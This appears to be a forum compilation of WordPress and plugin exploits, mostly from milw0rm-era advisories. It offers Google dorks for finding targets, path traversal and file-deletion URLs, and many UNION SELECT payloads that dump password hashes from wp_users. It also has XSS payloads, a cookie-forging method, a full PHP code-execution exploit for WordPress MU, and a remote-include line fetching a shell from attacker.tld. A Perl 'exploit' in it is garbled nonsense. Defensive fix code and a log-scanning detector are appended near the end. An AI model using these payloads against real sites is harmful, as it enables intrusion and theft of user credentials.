Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

The file manager is located here:
Code:
http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php

After the upload you will find the script in this directory:
Code:
http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)

Search query:
Code:
plugins/wp-filemanager/
inurl:/wp-filemanager/
Code:
/wp-admin/index.php?page=\..\..\file.php
/wp-admin/index.php?page=\..\..\.htaccess
/wp-admin/link-manager.php?page=\..\..\.htaccess
/wp-admin/link-add.php?page=\..\..\.htaccess
/wp-admin/link-categories.php?page=\..\..\.htaccess
/wp-admin/link-import.php?page=\..\..\.htaccess
/wp-admin/theme-editor.php?page=\..\..\.htaccess
/wp-admin/plugin-editor.php?page=\..\..\.htaccess
/wp-admin/profile.php?page=\..\..\.htaccess
/wp-admin/users.php?page=\..\..\.htaccess
/wp-admin/options-general.php?page=\..\..\.htaccess
/wp-admin/options-writing.php?page=\..\..\.htaccess
/wp-admin/options-reading.php?page=\..\..\.htaccess
/wp-admin/options-discussion.php?page=\..\..\.htaccess
/wp-admin/options-permalink.php?page=\..\..\.htaccess
/wp-admin/options-misc.php?page=\..\..\.htaccess
/wp-admin/import.php?page=\..\..\.htaccess
/wp-admin/admin.php?page=\..\..\.htaccess
/wp-admin/bookmarklet.php?page=\..\..\.htaccess
/wp-admin/cat-js.php?page=\..\..\.htaccess
/wp-admin/inline-uploading.php?page=\..\..\.htaccess
/wp-admin/options.php?page=\..\..\.htaccess
/wp-admin/profile-update.php?page=\..\..\.htaccess
/wp-admin/sidebar.php?page=\..\..\.htaccess
/wp-admin/user-edit.php?page=\..\..\.htaccess
win only
WordPress <=2.3.1 Cookies Manipulation - Login using the md5() password hash in cookies

Program: WordPress 2.3.1 and earlier versions
Severity: Low
Exploit available: No
Description: The vulnerability allows a remote user to bypass certain security restrictions. It exists because an attacker can construct the two authentication cookies ("wordpressuser_*" and "wordpresspass_*") from data in the "users" table and gain administrative access to the application. To exploit the vulnerability the attacker needs read access to the "users" table in the database.
Description and site: http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
==================================
PHP:
$siteurl; $host;
'wordpressuser_'.md5($siteurl).'='.$login
'wordpresspass_'.md5($siteurl).'='.md5(md5($pass))

Here $siteurl is a variable stored in the DB: wp_options -> siteurl. So during an SQL injection it is worth pulling that out as well: (select siteurl from wp_options)
Sometimes one WordPress install serves several domain names. In that case $host is used instead of $siteurl; it is effectively the URL path to the blog, e.g. http://wordpress.com/blog, without a trailing slash.

NEW! Addendum. COOKIEHASH disclosure. There is no need to obtain siteurl, md5 it and verify it at all. It is enough to send a POST request to wp-pass.php or wp-login.php; the response returns a valid cookie COOKIEHASH.
[-1-] /wp-login.php?action=logout
[-2-] wp-pass.php
Code:
POST /wordpress/wp-pass.php HTTP/1.0
Host: localhost
Content-Length: 20

post_password=test
Files locations
Code:
blogscout lectblog blogs blog blog-* blog* myblog bloggt blo *-blog wp wordpress wordpress.1 wordpress-1 wordpress_1 wordpress-* wordpress_* weblog webblog webblogs web-blog my-journals myjournal my-favorite-blog myblog myblogs my-blogs wp1-5 wp2.2 wp2-2 wp2.3 wp2-3 wp2.2 wp2.0 powered-by-wordpress wordpress-mu wordpress_1_5 wordpress-1.5 wordpress-1-5-1 wordpress-1.5.2 wordpress-1.0.2 wordpress-1-2-2 wordpress_2.0_only wordpress_2.3-series wordpress_2.3.2 wordpress_2-3-1 Wordpress_2.4 Wordpress_2.5 Wordpress_2-5 wordpress_2.3.1 wordpress_2.0.2 wordpress_2.3 wordpress_2.0.7 Wordpress_2.4 wordpress_2.2.3 wordpress_2.1.2 WordPress_2.4 wordpress_2.3.1 WordPress_2-3 WordPress_2-2-2 WordPress_2-3-3 wordpress_2-3 Wordpress_2-2
Democracy 2.0.1 HTML Injection Vulnerability
Code:
http://wordpress.dom/blah'style=xss:expression(alert(document.cookie)); (Tested on IE7)
OR
http://wordpress.dom/blah'onMouseOver=javascript:alert(document.cookie);// (Tested on Firefox & IE)
fix
PHP:
Vulnerable code: in class.php (Line 166)
$url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)));
Change to:
$url = htmlspecialchars(add_query_arg(array('dem_action' => 'view', 'dem_poll_id' => $this->id)), ENT_QUOTES);
WP TextLinkAds Plugin SQL Injection Vulnerability
Code:
http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id='/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23
fix
PHP:
The vulnerable code is found on line 512:
$postId = $postId;
This variable is passed to $wpdb->get_results without being sanitised. To fix this hole, simply change the above line to:
$postId = (int) $postId;
WordPress<=2.0.3 Arbitrary file deletion
Windows only:
HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
This can also be used to carry out a DoS attack. Once index.php is deleted the site stops functioning normally.

WordPress<=2.0.3 DoS:
HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
Windows only:
HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

XSS:
HTML:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS: wp-cat2tag converter:
HTML:
http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>
WordPress versions <= 2.0.11 are vulnerable, and potentially later versions (2.1.x, 2.2.x and 2.3.x).
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Code:
remote sql injection exploit
###############################################################
# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/* (wp_tbv_users)
# >>> google: Fredrik Fahlstad. Version: 1.7.4.
# >>> author websec Team ./members =====> Virus_C, Refresh , Virusa
# >>> page : hacking.ge
###############################################################
this is example
http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
# milw0rm.com [2008-01-19]
XSS in plugin wp-slimstat 0.92 for Wordpress
PoC directly:
Code:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]

PoC in Perl:
Code:
# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he's blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj ([email protected])
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
#use Net::DNS:Simple;
#use Math;
use Socket;

print "Welcome. What is target email address of wordpress blog admin : \n";
my $target = <STDIN>;
print "ok target is $target\n";
sleep(3);
print "ok What is address of wordpress blog : \n";
sleep(5);
my $address = <STDIN>;
print "ok target is $target\n";
sleep(6);
# print "testing"
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n — CUT OUTPUT HERE — \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <[email protected]>\n";
print "RCPT TO: <$target>\n";
print "DATA\n";
print "Free x pciture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n — END OF OUTPUT CUT HERE –\n";
print "";
print "Ok now you neeed to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by [email protected] c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on"
#print "XSS initialized"
#payload
sleep(1);
exit(0);
# snips
Full path disclosure:
Code:
/wp-admin/theme-editor.php?page=
/wp-admin/plugins.php?page=
/wp-admin/plugin-editor.php?page=
/wp-admin/profile.php?page=
/wp-admin/users.php?page=
/wp-admin/options-general.php?page=
/wp-admin/cat-js.php?page=
/wp-admin/inline-uploading.php?page=
/wp-admin/options.php?page=
/wp-admin/profile-update.php?page=
/wp-admin/sidebar.php?page=
/wp-admin/user-edit.php?page=
/wp-admin/admin.php?page=
/wp-admin/admin-footer.php
/wp-admin/admin-functions.php
/wp-admin/edit-form.php
/wp-admin/edit-form-advanced.php
/wp-admin/edit-form-comment.php
/wp-admin/edit-link-form.php
/wp-admin/index.php?page=
/wp-admin/link-manager.php?page=
/wp-admin/link-add.php?page=
/wp-admin/link-categories.php?page=
/wp-admin/link-import.php?page=
/wp-admin/edit-page-form.php
/wp-admin/menu.php
/wp-admin/menu-header.php
/wp-admin/import/blogger.php
/wp-admin/import/dotclear.php
/wp-admin/import/greymatter.php
/wp-admin/import/livejournal.php
/wp-admin/options-writing.php?page=
/wp-admin/options-reading.php?page=
/wp-admin/options-discussion.php?page=
/wp-admin/options-permalink.php?page=
/wp-admin/options-misc.php?page=
/wp-admin/import.php?page=
/wp-admin/import/mt.php
/wp-admin/import/rss.php
/wp-admin/import/textpattern.php
/wp-admin/bookmarklet.php?page=
=====================
Changes between versions, for general reference:
_http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528
_http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority
=====================
Description: Login/password brute force that bypasses logging. Username enumeration and password brute forcing are possible via cookies (wp-login.php) and basic authentication (wp-app.php).
PHP:
function wp_login()
__('<strong>ERROR</strong>: Invalid username.');
__('<strong>ERROR</strong>: Incorrect password.');
========================
Description: COOKIEHASH disclosure. Sometimes there are problems constructing the cookies for the exploit. Usually this happens when the blog serves several domains/subdomains at once, and the "siteurl" pulled from the database does not fit. The header will return us an empty cookie with the prefix.
/wp-login.php?action=logout
/wp-pass.php
=====================
Description: Admin rights: writing to wp-config.php. There is no check of the file name on write. Reading wp-config.php is not allowed, but the check was forgotten on write. You can specify your own remote server and administer the blog through your own DB.
Cannot read:
/wp-admin/templates.php?file=wp-config.php
But can write:
/wp-admin/templates.php
POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php
=====================
Description: Passive XSS in $_POST['pages-sortby']. Rights: admin.
Examples of vulnerable code: /wp-admin/widgets.php
PHP:
function wp_widget_pages_control() {
$sortby = stripslashes( $_POST['pages-sortby'] );
<option value="post_title"<?php selected( $options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option>
<option value="menu_order"<?php selected( $options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option>
<option value="ID"<?php selected( $options['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option>
=====================
Description: The admin's mail login and password are stored in cleartext in the DB and displayed in the admin panel.
/wp-admin/options-writing.php
wp_options -mailserver_login -mailserver_pass
=====================
Description: When importing a blog, if there are posts without an author (anonymous), a user is created with default settings. So accounts with the default password "password" may exist.
Examples of vulnerable code: /wp-admin/import/greymatter.php
PHP:
$user_id = username_exists($post_author);
if (!$user_id) { // if deleted from GM, we register the author as a level 0 user
    $user_ip="127.0.0.1";
    $user_domain="localhost";
    $user_browser="server";
    $user_joindate="1979-06-06 00:41:00";
    $user_login=$wpdb->escape($post_author);
    $pass1=$wpdb->escape("password");
    $user_nickname=$wpdb->escape($post_author);
    $user_email=$wpdb->escape("[email protected]");
    $user_url=$wpdb->escape("");
    $user_joindate=$wpdb->escape($user_joindate);
    $user_info = array("user_login"=>$user_login, "user_pass"=>$pass1, "user_nickname"=>$user_nickname, "user_email"=>$user_email, "user_url"=>$user_url, "user_ip"=>$user_ip, "user_domain"=>$user_domain, "user_browser"=>$user_browser, "dateYMDhour"=>$user_joindate, "user_level"=>0, "user_idmode"=>"nickname");
    $user_id = wp_insert_user($user_info);
    $this->gmnames[$postinfo[1]] = $user_id;
}
=====================
# Author : Houssamix From H-T Team
# Script : Wordpress Plugin fGallery 2.4.1
# Download : http://www.fahlstad.se/wp-plugins/fgallery/
# BUG : Remote SQL Injection Vulnerability
# Dork : inurl:/wp-content/plugins/fgallery/
## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~
PHP:
$cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
$images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit :
[Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--
Example

# Script : Wordpress Plugin WP-Cal
# Download : http://www.fahlstad.se/wp-plugins/wp-cal/
# BUG : Remote SQL Injection Vulnerability
# Dorks : inurl:/wp-content/plugins/wp-cal/ inurl:/WP-Cal/
## Vulnerable CODE :
~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~
PHP:
$id = $_GET['id'];
$event = $wpdb->get_row("SELECT * FROM $table WHERE id = $id");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit :
/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
example :
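The fGallery and WP-Cal queries quoted above, and the TextLinkAds `(int)` cast from earlier in the thread, share one defect: the request parameter is spliced into the SQL text. The following is an added example, not code from any of these plugins or their authors; it assumes the plugin's own `$wpdb`, `$cats` and `$imgs` variables, and uses the real WordPress `$wpdb->prepare()` API to show the vulnerable form beside a hardened one.

```php
<?php
// Added example, not the plugin authors' code. Assumes the plugin's own $wpdb,
// $cats and $imgs variables; $wpdb->prepare() is the real WordPress API.

// Vulnerable form (as quoted from fim_rss.php, with the array key quoted): the
// request parameter becomes part of the SQL text, so a value such as
// "-1 union select 1,concat(user_login,...) from wp_users--" is executed as SQL.
function fgallery_album_unsafe($wpdb, $cats, $imgs)
{
    $cat    = $wpdb->get_row("SELECT * FROM $cats WHERE id = {$_GET['album']}");
    $images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = {$_GET['album']} AND status = 'include'");
    return array($cat, $images);
}

// Hardened form: reject anything that is not a decimal integer before any query
// runs, then bind the value through prepare() with a %d placeholder. The SQL text
// is now constant; only the plugin's own table names are interpolated.
function fgallery_album_safe($wpdb, $cats, $imgs)
{
    if (!isset($_GET['album']) || !ctype_digit((string) $_GET['album'])) {
        return null; // invalid id: no query is issued at all
    }
    $album  = (int) $_GET['album'];
    $cat    = $wpdb->get_row($wpdb->prepare("SELECT * FROM $cats WHERE id = %d", $album));
    $images = $wpdb->get_results($wpdb->prepare(
        "SELECT * FROM $imgs WHERE cat = %d AND status = 'include'", $album
    ));
    return array($cat, $images);
}

// The one-line fix from the TextLinkAds post, applied to WP-Cal's editevent.php:
// casting turns "-1 union select ..." into -1 before it is used, so the payload
// never reaches $wpdb->get_row(). Validation plus prepare() (above) is still preferable
// because it also refuses the request instead of silently querying id -1.
function wpcal_event_id_from_request()
{
    return isset($_GET['id']) ? (int) $_GET['id'] : 0;
}
```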
Wordpress Plugin wp-adserve (adclick.php) SQL Injection
SQL Injection:
Code:
http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
To search, enter:
Code:
allinurl: "wp-adserve"

Wordpress Plugin WassUp 1.4.1 Remote SQL Injection
SQL Injection:
Code:
http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
To search, enter:
Code:
allinurl: "plugins/wassup"
(c)
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities
PoC: http://milw0rm.com/exploits/5035

Wordpress Plugin Wordspew Remote SQL Injection Vulnerability
PoC: http://milw0rm.com/exploits/5039
Wordpress Plugin wp-footnotes 2.2 Multiple XSS
Code:
http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>
http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>
http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>
http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")
Wordpress Plugin st_newsletter Remote SQL Injection
SQL Injection
Code:
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
To search:
Code:
allinurl :"wp-content/plugins/st_newsletter"
allinurl :"shiftthis-preview.php"
(c)
Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit:
PHP:
<?php
/*
WordPress [MU] blog's options overwrite
Credits : Alexander Concha <alex at buayacorp dot com>
Website : http://www.buayacorp.com/
Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

This exploit uses active_plugins option to execute arbitrary PHP
*/
include_once './class-snoopy.php';

// Fix Snoopy
class SnoopyExt extends Snoopy {
    function _prepare_post_body($formvars, $formfiles) {
        if ( is_string($formvars) ) {
            return $formvars;
        }
        return parent::_prepare_post_body($formvars, $formfiles);
    }
}

set_time_limit( 0 );

// Any user with 'manage_options' and 'upload_files' capabilities
$user = 'user';
$pass = '1234';
$blog_url = 'http://localhost.localdomain/mu/';
$remote_file = ''; // relative path to wp-content
$local_file = '';  // the contents of this file, if any, will be uploaded

$snoopy = new SnoopyExt();
$snoopy->maxredirs = 0;
$snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
$snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));
$snoopy->setcookies(); // Set auth cookies for future requests

if ( empty($remote_file) ) {
    // Upload a new file
    $snoopy->_submit_type = 'image/gif';
    $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());
    if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) {
        $remote_file = basename($match[1]);
    }
}
if ( empty($remote_file) ) die('Exploit failed...');

// Look for real path
$snoopy->fetch("{$blog_url}wp-admin/export.php?download");
if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) {
    $remote_file = preg_replace('#.*?wp-content#', '', $match[1]);
}
if ( empty($remote_file) ) die('Exploit failed...');

// It assumes that file uploads are stored within wp-content
$remote_file = '../' . ltrim($remote_file, '/');

$snoopy->fetch("{$blog_url}wp-admin/plugins.php");
// Recover previous active plugins
$active_plugins = array();
if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) {
    foreach ($matches[0] as $plugin) {
        if ( preg_match('#plugin=([^&]+)#', $plugin, $match) )
            $active_plugins[] = urldecode($match[1]);
    }
    print_r($active_plugins);
}
$active_plugins[] = $remote_file;

// Fetch a valid nonce
$snoopy->fetch("{$blog_url}wp-admin/options-general.php");
if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {
    // Finally update active_plugins
    $snoopy->set_submit_normal();
    $snoopy->submit("{$blog_url}wp-admin/options.php", array(
        'active_plugins' => $active_plugins,
        '_wpnonce'       => $match[1],
        'action'         => 'update',
        'page_options'   => 'active_plugins',
    ));
}

function get_contents() {
    global $local_file;
    return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
}
?>
# milw0rm.com [2008-02-05]
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
example
Code:
http://xxxxx/forums?forum=xxxx&topic=(exploit)
EXPLOIT 1 :
Code:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOIT 2 :
Code:
SOMETIMES YOU CAN'T SEE (xxxx&topic) SO USE THIS EXPLOIT AFTER forum=xxx(number)
example
Code:
www.xxxxx/forums?forum=1(exploit)&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
example :
Code:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :
Code:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :
Code:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(c) milw0rm.com
Wordpress Photo album Remote SQL Injection Vulnerability
EXAMPLE
Exploit by Auth S@BUN
http://milw0rm.com/exploits/5135
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

RFI
Register Globals: ON
PoC:
Code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?

XSS
Register Globals: ON
PoC:
Code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E
Register Globals: Off
Code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Remote Code Execution
Register Globals: ON
PoC:
Code:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
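The request shapes collected across this thread (Windows-style `\..\..` traversal in `page=`/`backup=`, `UNION SELECT` against `wp_users`, `<script>` in admin parameters, the sniplets `libpath=http://` include and inline `<?php`) all leave a recognisable trace in the web server's access log. The scanner below is an added example, not code from any post above; the log lines are constructed sample data and the regexes are assumptions about how these requests appear in a combined-format log.

```php
<?php
// Added example (not from any post in this thread). The access-log lines below are
// constructed sample data; the rules are assumptions about how the requests quoted
// in this thread look in a combined-format log.

$rules = array(
    // ?page=\..\.. and &backup=\..\.. (raw or %-encoded); Unix ../ is covered too
    'traversal'   => '/(?:\?|&)(?:page|backup)=(?:%5C|\\\\|%2E%2E|\.\.)/i',
    'sqli_union'  => '/union(?:\/\*\*\/|%20|\+|\s)+select/i',
    'sqli_users'  => '/from(?:\/\*\*\/|%20|\+|\s)+wp_(?:tbv_)?users/i',
    'xss_script'  => '/(?:<|%3C)script(?:>|%3E)/i',
    'rfi_libpath' => '/libpath=https?(?::|%3A)/i',
    'php_inline'  => '/(?:<|%3C)\?php/i',
);

// Pull the request target out of a combined-format access-log line.
function request_from_log_line($line)
{
    if (preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/\d\.\d"/', $line, $m)) {
        return $m[1];
    }
    return null;
}

// Return the names of every rule the request matches, testing both the raw and
// the URL-decoded form so one level of %-encoding does not slip past a rule.
function classify_request(array $rules, $request)
{
    $hits    = array();
    $decoded = rawurldecode($request);
    foreach ($rules as $name => $re) {
        if (preg_match($re, $request) || preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log: four requests modelled on this thread, one benign request.
$sample_log = array(
    '10.0.0.5 - - [19/Jan/2008:10:01:00 +0000] "GET /wp-admin/index.php?page=\..\..\.htaccess HTTP/1.0" 200 512',
    '10.0.0.5 - - [19/Jan/2008:10:01:03 +0000] "GET /?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass),null+from+wp_users/* HTTP/1.0" 200 2048',
    '10.0.0.9 - - [19/Jan/2008:10:02:00 +0000] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt? HTTP/1.0" 200 100',
    '10.0.0.7 - - [19/Jan/2008:10:03:00 +0000] "GET /wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 900',
    '10.0.0.2 - - [19/Jan/2008:10:04:00 +0000] "GET /wp-admin/index.php?page=wp-slimstat/wp-slimstat.php&panel=1 HTTP/1.1" 200 7000',
);

foreach ($sample_log as $line) {
    $req  = request_from_log_line($line);
    $hits = ($req === null) ? array() : classify_request($rules, $req);
    printf("%-22s %s\n", $hits ? implode(',', $hits) : 'clean', substr((string) $req, 0, 60));
}
```

Expected classification for the five sample lines, in order: traversal; sqli_union,sqli_users; rfi_libpath; xss_script; clean.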